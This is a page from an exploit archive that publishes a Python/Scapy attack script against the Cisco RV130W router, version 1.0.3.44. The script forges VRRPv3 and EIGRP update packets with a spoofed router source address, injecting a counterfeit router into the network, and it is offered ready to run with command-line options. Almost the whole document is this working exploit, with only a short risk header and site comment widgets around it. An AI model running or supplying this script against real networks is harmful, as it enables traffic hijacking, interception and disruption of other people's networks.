Cisco Small Business RV130W 1.0.3.44 Injection

2021.09.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers # Date: 24/09/2021 # Exploit Author: Michael Alamoot # Vendor Homepage: https://www.cisco.com/ # Version: RV130W 1.0.3.44 # Tested on: Kali linux #! /usr/bin/env python3 from scapy.contrib.eigrp import EIGRPAuthData from scapy.contrib.eigrp import EIGRPIntRoute from scapy.contrib.eigrp import EIGRPGeneric from scapy.contrib.eigrp import EIGRPSeq from scapy.contrib.eigrp import EIGRP from scapy.layers.vrrp import VRRPv3 from scapy.layers.vrrp import VRRP from scapy.layers.l2 import Ether from scapy.layers.inet import IP from scapy.sendrecv import sendp from scapy.volatile import RandMAC from scapy.all import conf import socket,networkx,os import argparse,sys,asyncio class argX: def __init__(self): self.parser = argparse.ArgumentParser(description="...") self.parser.add_argument( "-i","--ip", help="ip router fake injection", dest="ip", ) self.parser.add_argument( "-r","--ip-router", help="ip router root", dest="router", default=conf.route.route('0.0.0.0')[2] ) def argvX(self): """ [0] ip-router [1] ip-fake """ args = self.parser.parse_args() ip = args.ip route = args.router return [ip,route] class exploit(object): def __new__(cls,*args,**kwargs): return super(exploit,cls).__new__(cls) def __init__(self,IProuter,InjectFackeRouter): self.IProuter = IProuter self.InjectFackeRouter = InjectFackeRouter self.MAC = RandMAC() def pyload(self): pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\ /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\ /IP(src=self.IProuter,dst="224.0.0.10") \ /EIGRP(opcode="Update",asn=100,seq=0,ack=0 ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)]) return pyload def start(self,count=[0,100]): for i in range(count[0],count[1]): sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0) print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m") if __name__ == "__main__": a = argX().argvX() if a[0]: net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0]) net1.start() else: print("[-h] [--help]")


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top